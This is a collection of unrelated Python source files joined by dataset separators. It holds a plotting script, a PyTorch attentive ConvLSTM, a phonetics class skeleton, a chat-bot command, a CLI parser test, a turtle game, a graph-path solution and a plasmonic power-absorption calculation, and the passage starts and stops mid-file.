identify the input in a graph)
-t (type of graph that will be printed,
it must be one of keys in input files e.g. AUC or EF1)
-d (directory where to store graph)
"""
import argparse
import json
import matplotlib.pyplot as plt
import inputoutput_utils
def _main():
configuration = _read_configuration()
print_graph(configuration["input_evaluation"], configuration["directory"],
configuration["nicknames"], configuration["type"])
def _read_configuration() -> dict:
parser = argparse.ArgumentParser(description="script that prints graph")
parser.add_argument("-e", type=str, dest="input_evaluation",
help="input comma separated files with evaluation", required=True)
parser.add_argument("-n", type=str, dest="nicknames",
help="input nicknames for files that will be printed in graph",
required=True)
parser.add_argument("-t", type=str, dest="type",
help="type of graph", required=True)
parser.add_argument("-d", dest="directory",
help="directory where to store graph", required=True)
configuration = vars(parser.parse_args())
input_files = []
for file in configuration["input_evaluation"].split(","):
input_files.append(file)
configuration["input_evaluation"] = input_files
input_nicknames = []
for file in configuration["nicknames"].split(","):
input_nicknames.append(file)
configuration["nicknames"] = input_nicknames
if configuration["directory"] is None:
configuration["directory"] = ""
if len(configuration["input_evaluation"]) != len(configuration["nicknames"]):
print("Wrong input, the number of nicknames must be equal to the number of input files")
exit(1)
return configuration
def print_graph(activity_files: list, directory: str, nicknames: list, input_type: str):
input_values = []
for file in activity_files:
with open(file, "r", encoding="utf-8") as activity_file:
for new_line in activity_file:
line = json.loads(new_line)
input_values.append(line[input_type.upper()])
plt.plot(nicknames, input_values, marker="o")
if input_type.upper() == "EF1":
plt.ylabel("EF 1%")
elif input_type.upper() == "EF5":
plt.ylabel("EF 5%")
else:
plt.ylabel(input_type.upper())
if directory != "":
file_name = directory + "/" + input_type.upper() + ".png"
else:
file_name = input_type.upper() + ".png"
inputoutput_utils.create_parent_directory(file_name)
plt.xticks(rotation=90, fontsize="x-small")
plt.tight_layout()
plt.savefig(file_name, dpi=150)
plt.figure()
if __name__ == "__main__":
_main()
| StarcoderdataPython |
228856 | import torch.nn as nn
nb_timestep = 4
# https://github.com/PanoAsh/Saliency-Attentive-Model-Pytorch/blob/master/main.py
class AttentiveLSTM(nn.Module):
def __init__(self, nb_features_in, nb_features_out, nb_features_att, nb_rows, nb_cols):
super(AttentiveLSTM, self).__init__()
# define the fundamantal parameters
self.nb_features_in = nb_features_in
self.nb_features_out = nb_features_out
self.nb_features_att = nb_features_att
self.nb_rows = nb_rows
self.nb_cols = nb_cols
# define convs
self.W_a = nn.Conv2d(in_channels=self.nb_features_att, out_channels=self.nb_features_att,
kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
self.U_a = nn.Conv2d(in_channels=self.nb_features_in, out_channels=self.nb_features_att,
kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
self.V_a = nn.Conv2d(in_channels=self.nb_features_att, out_channels=1,
kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=False)
self.W_i = nn.Conv2d(in_channels=self.nb_features_in, out_channels=self.nb_features_out,
kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
self.U_i = nn.Conv2d(in_channels=self.nb_features_out, out_channels=self.nb_features_out,
kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
self.W_f = nn.Conv2d(in_channels=self.nb_features_in, out_channels=self.nb_features_out,
kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
self.U_f = nn.Conv2d(in_channels=self.nb_features_out, out_channels=self.nb_features_out,
kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
self.W_c = nn.Conv2d(in_channels=self.nb_features_in, out_channels=self.nb_features_out,
kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
self.U_c = nn.Conv2d(in_channels=self.nb_features_out, out_channels=self.nb_features_out,
kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
self.W_o = nn.Conv2d(in_channels=self.nb_features_in, out_channels=self.nb_features_out,
kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
self.U_o = nn.Conv2d(in_channels=self.nb_features_out, out_channels=self.nb_features_out,
kernel_size=self.nb_rows, stride=1, padding=1, dilation=1, groups=1, bias=True)
# define activations
self.tanh = nn.Tanh()
self.sigmoid = nn.Sigmoid()
self.softmax = nn.Softmax(dim=-1)
# define number of temporal steps
self.nb_ts = nb_timestep
def forward(self, x):
# get the current cell memory and hidden state
h_curr, c_curr = x, x
for i in range(self.nb_ts):
# the attentive model
my_Z = self.V_a(self.tanh(self.W_a(h_curr) + self.U_a(x)))
my_A = self.softmax(my_Z)
AM_cL = my_A * x
# the convLSTM model
my_I = self.sigmoid(self.W_i(AM_cL) + self.U_i(h_curr))
my_F = self.sigmoid(self.W_f(AM_cL) + self.U_f(h_curr))
my_O = self.sigmoid(self.W_o(AM_cL) + self.U_o(h_curr))
my_G = self.tanh(self.W_c(AM_cL) + self.U_c(h_curr))
c_next = my_G * my_I + my_F * c_curr
h_next = self.tanh(c_next) * my_O
c_curr = c_next
h_curr = h_next
return h_curr
class SequenceAttentiveLSTM(AttentiveLSTM):
def __init__(self, *args, sequence_len=2, sequence_norm=True, **kwargs):
super().__init__(*args, **kwargs)
if sequence_norm:
self.sequence_norm = nn.BatchNorm3d(sequence_len)
# self.sequence_len = sequence_len
else:
self.sequence_norm = lambda x : x
# self.sequence_len = None
def forward(self, x):
x = self.sequence_norm(x)
# get the current cell memory and hidden state
h_curr, c_curr = x[:,0], x[:,0]
for i in range(x.shape[1]): # for i in range(self.sequence_len):
# the attentive model
my_Z = self.V_a(self.tanh(self.W_a(h_curr) + self.U_a(x[:,i])))
my_A = self.softmax(my_Z)
AM_cL = my_A * x[:,i]
# the convLSTM model
my_I = self.sigmoid(self.W_i(AM_cL) + self.U_i(h_curr))
my_F = self.sigmoid(self.W_f(AM_cL) + self.U_f(h_curr))
my_O = self.sigmoid(self.W_o(AM_cL) + self.U_o(h_curr))
my_G = self.tanh(self.W_c(AM_cL) + self.U_c(h_curr))
c_next = my_G * my_I + my_F * c_curr
h_next = self.tanh(c_next) * my_O
c_curr = c_next
h_curr = h_next
return h_curr
| StarcoderdataPython |
9684986 | <gh_stars>0
#!/usr/bin/python
# module abstractphonetics
# This module contains a
#
# Copyright (c) 2020 Universidad de Costa Rica.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the <organization> nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <NAME> BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Researchers:
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# This module contains the methods, classes and variables necessary for the
# implementation of a phonetic system necessary for a research project.
#################
#################
#################
### ###
### NOTES ###
### ###
#################
#################
#################
################################
################################
## ##
## IMPLEMENTATION DECISIONS ##
## ##
################################
################################
###################
###################
## ##
## LIMITATIONS ##
## ##
###################
###################
###########
# IMPORTS #
###########
####################
# GLOBAL VARIABLES #
####################
################################
################################
################################
### ###
### METHODS AND FUNCTIONS ###
### ###
################################
################################
################################
#################
#################
## ##
## FUNCTIONS ##
## ##
#################
#################
###############
###############
## ##
## METHODS ##
## ##
###############
###############
###################
###################
###################
### ###
### CLASSES ###
### ###
###################
###################
###################
##########################
##########################
## ##
## CLASS ABSTRACTPHONE ##
## ##
##########################
##########################
class AbstractPhone:
# This is the class AbstractPhone, that represents, in the most abstract way
# possible, a phone object as in acustic or articularoty phonetics, but also,
# if it is the case, phones in the sense of signs in sign language. Even so,
# if the need arises, it could be used to implement syllabaries.
#
# This class has three main attributes:
#
# - _features: This is a dictionary, where each key corresponds to a
# predefined list of features, given globally by the phonetic
# system, and the value is either True, False or None. None is
# used only if the particular feature is not specified yet.
#
# - _name: This is also a dictionary. In this case, the key is the type of
# name to include, for example, in articularoty phonetics, it could
# be voicing, point of articulation, manner of articulation, etc.
# The value is, the actual value of this particular, like voiced or
# unvoiced, plossive, fricative, etc.
#
# - _symbol: This is a string, often consisting on a single character, that
# identifies the phone in a unique manner. It could be the
# IPA symbol, or the X-SAMPA.
#
##############
# ATTRIBUTES #
##############
_features = {}
_name = {}
_symbol = ""
############
# CREATORS #
############
def __init__(self,theFeatures,theName,theSymbol):
# This is a simple creator for the class AbstractPhone. Takes as
# arguments the following:
#
# - theFeatures: This is a dictionary in which the key is the respective
# feature name, and the value is True or False, as it
# corresponds.
#
# - theName: This is a dictionary in which the key is the naming
# cathegory and the value is the corresponding name.
#
# - theSymbol: String that contains the single character or set of
# characters that uniquely identifies the phone.
#
if len(theSymbol) > 0:
self._symbol = theSymbol
keys = theName.keys()
for x in keys:
self._name[x] = theName[x]
keys = theFeatures.keys()
for x in keys:
self._features[x] = theFeatures[x]
return True
else:
return False
###########
# GETTERS #
###########
def getSymbol(self):
return self._symbol
def getName(self):
pass
def getFeatures(self):
pass
def getNameValue(self,cathegory):
return self._name[cathegory]
def getFeatureValue(self,feature):
return self._features[feature]
###########
# SETTERS #
###########
def setSymbol(self,symbol):
self._symbol = symbol
def setName(self,name):
keys = name.keys()
for key in keys:
self._name[key] = name[key]
def setFeatures(self,features):
keys = features.keys()
for key in keys:
self._features[key] = features[key]
def setNameValue(self,key,value):
self._name[key] = value
def setFeatureValue(self,key,value):
self._features[key] = value
###########
# METHODS #
###########
def isEmpty(self):
# This function returns True if phone has no attributes, name or symbol,
# it returns False otherwise.
L = 0
keys = self._features.keys()
for x in keys:
if self._features[x] != None:
L += 1
keys = self._names.keys()
for x in keys:
if self._names[x] != None:
L += 1
if len(self._symbol) == 0:
return True
elif L == 0:
return True
else:
return False
##############################
##############################
## ##
## CLASS ABSTRACTPHONETICS ##
## ##
##############################
##############################
class AbstractPhoneticSystem:
# This class implements an Abstract Phonetic Systems. It is an object that
# contains four attributes: _inventory (list of AbstractPhone objects),
# _rules (list of FeatureRule objects), _features (list of strings of all
# the phonetic features' names), _names (list of strings of all the naming
# cathegories names). The attribute _names and _features should not change
# what so ever after the class has been instantiated.
##############
# ATTRIBUTES #
##############
_inventory = []
_rules = []
_features = []
_names = []
############
# CREATORS #
############
def __init__(self,featureArray,namingArray):
self.features = featureArray
self.names = namingArray
###########
# GETTERS #
###########
def getInventory(self):
return self._inventory
def getRules(self):
return self._rules
def getFeatureList(self):
return self._features
def getNamingList(self):
return self._names
###########
# SETTERS #
###########
###########
# METHODS #
###########
def addPhone(self,phone):
# This method adds a phone to the inventory of the phonetic system. It
# must make a check that the new phone does not contradict the rules
# contained to that point on the rule book.
count = 0
for rule in self._rules:
flag = rule.isConsistent(phone)
if not flag:
count += 1
if count == 0:
self._inventory.append(phone)
flag = True
else:
flag = False
return flag
def addRule(self,rule):
# This method adds a rule to the rule book of the system. It is
# important to note that the new rule must be checked not to make the
# rule system inconsistent.
pass
def getMatches(self,conditions):
# This function receives a list of pairs, called "conditions", where
# each pair is either a feature name and feature vaule, or a naming
# cathegory and the corresponding name. It returns a list of all the
# phones in the phonetic system's inventory that satisfy all the
# conditions. For example, if the list of conditions is empty, then the
# funtion will return the entire inventory by vacuity.
#
# ARGUMENTS:
#
# - conditions: List. Its elements are pairs. For example, it could be
# given by:
# conditions = [["SYLLABIC", False], ["PHONATION","UNVOICED"]].
#
matches = []
for phone in self._inventory:
tempFlag = True
for condition in conditions:
key = condition[0]
if key in self._features:
value = phone.getFeatureValue(key)
if value != None and value != condition[1]:
tempFlag = False
elif key in self._names:
value = phone.getNameValue(key)
if value != condition[1]:
tempFlag = False
else:
tempFlag = False
if tempFlag:
matches.append(phone)
return matches
def findPhoneBySymbol(self,symbol):
# This function returns the phone in the Phonetic System with the given
# symbol. If such phone does not exists, it returns an empty phone.
K = len(self._inventory)
k = 0
flag = True
thePhone = None
while k < K and flag:
s = self._inventory[k].getSymbol()
if s == symbol:
thePhone = self._inventory[k]
flag = False
else:
k += 1
if thePhone == None:
thePhone = AbstractPhone({},{},"")
return thePhone
######################
######################
## ##
## CLASS SOMECLASS ##
## ##
######################
######################
class FeatureRule:
# Description.
##############
# ATTRIBUTES #
##############
_antecedents = []
_consequents = []
############
# CREATORS #
############
###########
# GETTERS #
###########
###########
# SETTERS #
###########
###########
# METHODS #
###########
def isConsistent(self,phone):
# This method takes an object of the class AbstractPhone, and checks if
# the phone is consistent with the current rule. This is, either not all
# the anticedents are satisfied, this is, the rule does not apply, or if
# all the antecedents are satisfied and all the consecuents are
# satisfied, this is, the rule is fulfilled, then, it returns True. If
# all the antecedents are satisfied, but not all the consequents are,
# then the rule is violated, and this method returns False.
pass
###############
# END OF FILE #
###############
| StarcoderdataPython |
3561334 | <gh_stars>0
from userbot import is_mongo_alive, is_redis_alive, BOTLOG, BOTLOG_CHATID
from userbot.events import register
from userbot.modules.dbhelper import add_list
from . import DB_FAILED
@register(outgoing=True, pattern=r"^\.add(g)?list (\w*)")
async def addlist(event):
""" For .add(g)list command, saves lists in a chat. """
if not is_mongo_alive() or not is_redis_alive():
await event.edit(DB_FAILED)
return
is_global = event.pattern_match.group(1) == "g"
listname = event.pattern_match.group(2)
content = event.text.partition(f"{listname} ")[2].splitlines()
msg = "`List {} successfully. Use` ${} `to get it.`"
chatid = 0 if is_global else event.chat_id
if await add_list(chatid, listname, content) is False:
await event.edit(msg.format('updated', listname))
else:
await event.edit(msg.format('created', listname))
if BOTLOG:
listat = "global storage" if is_global else str(event.chat_id)
await event.client.send_message(
BOTLOG_CHATID, f"Created list {listname} in {listat}")
| StarcoderdataPython |
6614696 | <gh_stars>1-10
import unittest
from tabcmd.commands.project.create_project_command import CreateProjectCommand
from .common_setup import *
commandname = "createproject"
class CreateProjectParserTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.parser_under_test = initialize_test_pieces(commandname, CreateProjectCommand)
def test_create_project_parser_optional_arguments(self):
mock_args = [
commandname,
"--name",
"testproject",
"--parent-project-path",
"abcdef",
"--description",
"desc",
]
args = self.parser_under_test.parse_args(mock_args)
assert args.project_name == "testproject"
assert args.parent_project_path == "abcdef"
def test_create_project_parser_required_arguments_name(self):
mock_args = [
commandname,
"-n",
"project-name",
"--parent-project-path",
"abcdef",
"--description",
"desc",
]
args = self.parser_under_test.parse_args(mock_args)
assert args.project_name == "project-name"
assert args.parent_project_path == "abcdef"
def test_create_project_parser_required_arguments_missing_name(self):
mock_args = [
commandname,
"--parent-project-path",
"abcdef",
"--description",
"desc",
]
with self.assertRaises(SystemExit):
self.parser_under_test.parse_args(mock_args)
def test_create_project_parser_optional_arguments_missing_project_path(self):
mock_args = [
commandname,
"-n",
"project-name",
"--parent-project-path",
"--description",
"desc",
]
with self.assertRaises(SystemExit):
args = self.parser_under_test.parse_args(mock_args)
| StarcoderdataPython |
683 |
class Node(object):
def __init__(self, name, follow_list, intention, lane):
self.name = name
self.follow_list = follow_list
self.intention = intention
self.lane = lane
def __eq__(self, other):
if isinstance(other, Node):
if self.name == other.get_name() and self.follow_list == other.get_follow_list() \
and self.intention == other.get_intention() and self.lane == other.get_lane():
return True
return False
def get_name(self):
return self.name
def set_name(self, name):
self.name = name
def get_follow_list(self):
return self.follow_list
def set_follow_list(self, follow_list):
self.follow_list = follow_list
def get_intention(self):
return self.intention
def set_intention(self, intention):
self.intention = intention
def get_lane(self):
return self.lane
def set_lane(self, lane):
self.lane = lane
| StarcoderdataPython |
3433998 | <filename>src/app.py
import threading
from random import randint, uniform
from playsound import playsound
from turtle import Screen, Turtle, screensize
from utils.alerts import show_alert
from utils.score import update_scoreboard
from intro import start_intro
screen = Screen()
screen.bgcolor('#000000')
screen.bgpic('./assets/background.gif')
screen.title('Space Junk Collector')
screen.delay(0)
# images
screen.addshape('./assets/collector.gif')
screen.addshape('./assets/satellite-1.gif')
# game state
development = False
ready = False
level = 0
score = 0
junk_list = []
junk_speed = 0.1
from collector import Collector, Bullet
player = Collector()
bullet = Bullet()
def create_junk(num_of_junk):
(x, y) = screensize()
for i in range(num_of_junk):
randomX = randint(-x, x)
randomY = randint(-7, y)
randomWidth = uniform(0.5, 1.5)
randomHeight = uniform(0.5, 1.5)
junk = Turtle()
junk.speed(0)
junk.hideturtle()
junk.shape('./assets/satellite-1.gif')
junk.penup()
junk.shapesize(randomWidth, randomHeight)
junk.goto(randomX, randomY)
junk.showturtle()
junk_list.append(junk)
def level_up():
global level, ready, junk_speed
ready = True
level += 1
if level == 1 or development: player.show()
update_scoreboard(score, level)
create_junk(3 * level)
junk_speed += level
if not development: start_intro(level_up)
else: level_up()
# keys
screen.onkeypress(lambda: player.left() if ready else None, 'a')
screen.onkeypress(lambda: player.left() if ready else None, 'Left')
screen.onkeypress(lambda: player.right() if ready else None, 'd')
screen.onkeypress(lambda: player.right() if ready else None, 'Right')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'w')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'Up')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'space')
screen.listen()
# game loop / object collision detection
def game():
global score, level
(player_x, player_y) = player.position()
if bullet.isvisible():
bullet.move()
for index, junk in list(enumerate(junk_list)):
if bullet.collided_with(junk):
junk.clear()
junk.hideturtle()
junk_list.remove(junk)
score += 1
update_scoreboard(score, level)
# play sound
def play_collect_sound():
thread = threading.Thread(
target = lambda: playsound('./assets/audio/collect_sound_effect.mp3', block=False),
name = 'soundThread'
)
thread.start()
play_collect_sound()
if len(junk_list) == 0:
# no more junk, level up!
bullet.destroy()
level_up()
for junk in junk_list:
(screen_x, screen_y) = screensize()
(x, y) = junk.position()
if (abs(x + 10) >= screen_x):
heading = junk.heading()
junk.setheading(180 - heading)
if (abs(x - 10) <= screen_x):
heading = junk.heading()
junk.setheading(-heading)
# consistent speed
mod = ((junk_speed * len(junk_list)) / (junk_speed * 3)) / 10
junk.forward(mod)
screen.ontimer(game, 1)
game()
update_scoreboard(score, level)
screen.update()
screen.mainloop()
| StarcoderdataPython |
1855641 | """ Leetcode 797 - All Paths From Source To Target
https://leetcode.com/problems/all-paths-from-source-to-target/
1. MINE DFS: Time: O(2^(N-2)) Space: O((N+2)*2^(N-3))
"""
from typing import List
class Solution1:
""" 1. MINE DFS """
def all_paths_source_target(self, graph: List[List[int]]) -> List[List[int]]:
if not graph:
return []
paths = []
target_idx = len(graph) - 1
self.dfs(graph, 0, target_idx, [], paths)
return paths
def dfs(self, graph, idx, target_idx, path, all_paths):
if idx == target_idx:
all_paths.append(path+[idx])
return
if not graph[idx] and idx != target_idx:
return
for i in graph[idx]:
self.dfs(graph, i, target_idx, path+[idx], all_paths)
if __name__ == '__main__':
graph = [[1, 2], [3], [3], []]
res = Solution1().all_paths_source_target(graph)
print(res)
| StarcoderdataPython |
11289308 | from .msg import MsgEnum
from .code import CodeEnum
from .modbus import ModbusCodeEnum
| StarcoderdataPython |
4833265 | <reponame>mkraft89/To_eels_app<filename>Calc_power_cresc.py
import numpy as np
from math import factorial
gamma = 0.032
n = np.arange(0,30,1)
ep0 = 8.85e-12
epD = 1.0
c = 3e8
Conv = 1.602e-19/6.626e-34*2*np.pi #Conversion from eV to SI-units
def Pow_abs(x0, x_e, c_e, g, R0, R1, omega):
"""Calculate the power absorbed in an annulus
with a 'circling' electron as exciting source inside.
The trajectory of the electron derives from a straight
trajectory in the non-concentric annulus frame.
Output: Resistive losses as a function of omega"""
epM = 1-64/(omega*(omega+1j*gamma))
omega = omega*Conv
R0_x0 = R0/x0
R1_x0 = R1/x0
a_n_s = np.zeros(np.size(n), dtype='complex128')
###Lambda = 4*pi*eps0 in expression for source coefficients
###Calculate lambda according to formula in ELS_slab_crescent.pdf
a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
for k_n in range(1,np.size(n)):
k_s = n[1:k_n+1]
sum_k = 0
sum_k_in = 0
for m in k_s:
sum_k += factorial(k_n-1) * (-omega*g/c_e/x0)**m\
/ (factorial(m) * factorial(m-1) * \
factorial(k_n - m))
a_n_s[k_n] = np.exp(+omega/c_e*x_e) / omega * sum_k
#Calculate expansion coefficients as in ELS_slab_crescent.pdf
b_n = a_n_s/\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
c_n = a_n_s/\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* (-2.) * epD * (epD+epM) * R1_x0**(2*n)
d_n = a_n_s/\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* 2. * epD * (epD-epM)
Term1 = sum(n * pow(abs(c_n),2) * x0**(2*n) * (R0**(-2*n)-R1**(-2*n)))
Term2 = sum(n * pow(abs(d_n),2) * x0**(-2*n) * (R1**(2*n)-R0**(2*n)))
# dip_x = 2*sum(n * b_n * g / x0)
# dip_y = -2j*sum(n * b_n * g / x0)
return np.pi * ep0 * omega * np.imag(epM) * (Term1+Term2)
# return dip_x, dip_y
# return sum_k
def Pow_abs_rad_r(x0, x_e, c_e, g2, R0, R1, omega):
"""Calculate the power absorbed in an annulus
with a 'circling' electron as exciting source inside.
The trajectory of the electron derives from a straight
trajectory in the non-concentric annulus frame, passing
on the right of the annulus
Output: Resistive losses as a function of omega"""
epM = 1-64/(omega*(omega+1j*gamma))
omega = omega*Conv
k0 = omega/c
R0_x0 = R0/x0
R1_x0 = R1/x0
a_n_s = np.zeros(np.size(n), dtype='complex128')
###Lambda = 4*pi*eps0 in expression for source coefficients
###Calculate lambda according to formula in ELS_slab_crescent.pdf
a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
for k_n in range(1,np.size(n)):
k_s = n[1:k_n+1]
sum_k = 0
sum_k_in = 0
for m in k_s:
sum_k += factorial(k_n-1) * (omega*g2/c_e/x0)**m\
/ (factorial(m) * factorial(m-1) * \
factorial(k_n - m))
a_n_s[k_n] = np.exp(-omega/c_e*x_e) / omega * sum_k
#Calculate scattering coefficients as in ELS_slab_crescent.pdf
b_n_2 = 1./\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
#Calculate the radiative reaction term as in ELS_slab_radiative_reac
a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
/ (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
* np.ones(np.size(n))
# print a_n_r, a_n_s
#Calculate expansion coefficients of induced field in metal
c_n = (a_n_s + a_n_r)/\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* (-2.) * epD * (epD+epM) * R1_x0**(2*n)
d_n = (a_n_s + a_n_r)/\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* 2. * epD * (epD-epM)
Term1 = sum(n * pow(abs(c_n),2) * x0**(2*n) * (R0**(-2*n)-R1**(-2*n)))
Term2 = sum(n * pow(abs(d_n),2) * x0**(-2*n) * (R1**(2*n)-R0**(2*n)))
return np.pi * ep0 * omega * np.imag(epM) * (Term1+Term2)
def Pow_abs_rad(x0, x_e, c_e, g2, R0, R1, omega):
"""Calculate the power absorbed in an annulus
with a 'circling' electron as exciting source inside.
The trajectory of the electron derives from a straight
trajectory in the non-concentric annulus frame.
Output: Resistive losses as a function of omega"""
epM = 1-64/(omega*(omega+1j*gamma))
omega = omega*Conv
k0 = omega/c
R0_x0 = R0/x0
R1_x0 = R1/x0
a_n_s = np.zeros(np.size(n), dtype='complex128')
###Lambda = 4*pi*eps0 in expression for source coefficients
###Calculate lambda according to formula in ELS_slab_crescent.pdf
a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
for k_n in range(1,np.size(n)):
k_s = n[1:k_n+1]
sum_k = 0
sum_k_in = 0
for m in k_s:
sum_k += factorial(k_n-1) * (-omega*g2/c_e/x0)**m\
/ (factorial(m) * factorial(m-1) * \
factorial(k_n - m))
a_n_s[k_n] = np.exp(+omega/c_e*x_e) / omega * sum_k
#Calculate scattering coefficients as in ELS_slab_crescent.pdf
b_n_2 = 1./\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
#Calculate the radiative reaction term as in ELS_slab_radiative_reac
a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
/ (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
* np.ones(np.size(n))
# print a_n_r, a_n_s
#Calculate expansion coefficients of induced field in metal
c_n = (a_n_s + a_n_r)/\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* (-2.) * epD * (epD+epM) * R1_x0**(2*n)
d_n = (a_n_s + a_n_r)/\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* 2. * epD * (epD-epM)
Term1 = sum(n * pow(abs(c_n),2) * x0**(2*n) * (R0**(-2*n)-R1**(-2*n)))
Term2 = sum(n * pow(abs(d_n),2) * x0**(-2*n) * (R1**(2*n)-R0**(2*n)))
return np.pi * ep0 * omega * np.imag(epM) * (Term1+Term2)
def Pow_sca_rad(x0, x_e, c_e, g2, R0, R1, omega):
"""Calculate the power scattered by the non-concentric
annulus. This is equivalent to the power absorbed by a
fictive absorver in the concentric annulus frame.
Output: Power scattered by non-concentric annulus
as a function of omega"""
epM = 1-64/(omega*(omega+1j*gamma))
omega = omega*Conv
k0 = omega/c
R0_x0 = R0/x0
R1_x0 = R1/x0
a_n_s = np.zeros(np.size(n), dtype='complex128')
###Lambda = 4*pi*eps0 in expression for source coefficients
###Calculate lambda according to formula in ELS_slab_crescent.pdf
a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
for k_n in range(1,np.size(n)):
k_s = n[1:k_n+1]
sum_k = 0
sum_k_in = 0
for m in k_s:
sum_k += factorial(k_n-1) * (-omega*g2/c_e/x0)**m\
/ (factorial(m) * factorial(m-1) * \
factorial(k_n - m))
a_n_s[k_n] = np.exp(+omega/c_e*x_e) / omega * sum_k
#Calculate scattering coefficients as in ELS_slab_crescent.pdf
b_n_2 = 1./\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
#Calculate the radiative reaction term as in ELS_slab_radiative_reac
a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
/ (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
* np.ones(np.size(n))
#Calculate scattering coefficient including radiative losses
b_n = b_n_2 * (a_n_r + a_n_s)
E_sca_squ = 2. / x0**2 * abs(np.sum(b_n*n))**2
return (np.pi*k0*g2)**2 * omega/4 * ep0 * E_sca_squ
def Pow_abs_rad_hori(x0, x_e, c_e, g2, R0, R1, omega):
"""Calculate the power absorbed in an annulus
with a 'circling' electron as exciting source inside.
The trajectory of the electron derives from a straight
trajectory in the non-concentric annulus frame.
Output: Resistive losses as a function of omega"""
epM = 1-64/(omega*(omega+1j*gamma))
omega = omega*Conv
k0 = omega/c
R0_x0 = R0/x0
R1_x0 = R1/x0
a_n_s = np.zeros(np.size(n), dtype='complex128')
###Lambda = 4*pi*eps0 in expression for source coefficients
###Calculate lambda according to formula in ELS_slab_crescent.pdf
a_n_s[0] = np.exp(+omega/c_e*x_e) / omega
for k_n in range(1,np.size(n)):
k_s = n[1:k_n+1]
sum_k = 0
sum_k_in = 0
for m in k_s:
sum_k += factorial(k_n-1) * (1j*omega*g2/c_e/x0)**m\
/ (factorial(m) * factorial(m-1) * \
factorial(k_n - m))
a_n_s[k_n] = np.exp(-omega/c_e*x_e) / omega * sum_k
#Calculate scattering coefficients as in ELS_slab_crescent.pdf
b_n_2 = 1./\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
* (epD-epM) * (epD+epM) * (1.-(R1/R0)**(2*n))
#Calculate the radiative reaction term as in ELS_slab_radiative_reac
a_n_r = -1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n*a_n_s)\
/ (1 + 1j*np.pi*(k0*g2/x0)**2/4 * np.sum(b_n_2*n))\
* np.ones(np.size(n))
# print a_n_r, a_n_s
#Calculate expansion coefficients of induced field in metal
c_n = (a_n_s + a_n_r)/\
((epD - epM)**2*R0_x0**(2*n) - (epD + epM)**2*R1_x0**(2*n))\
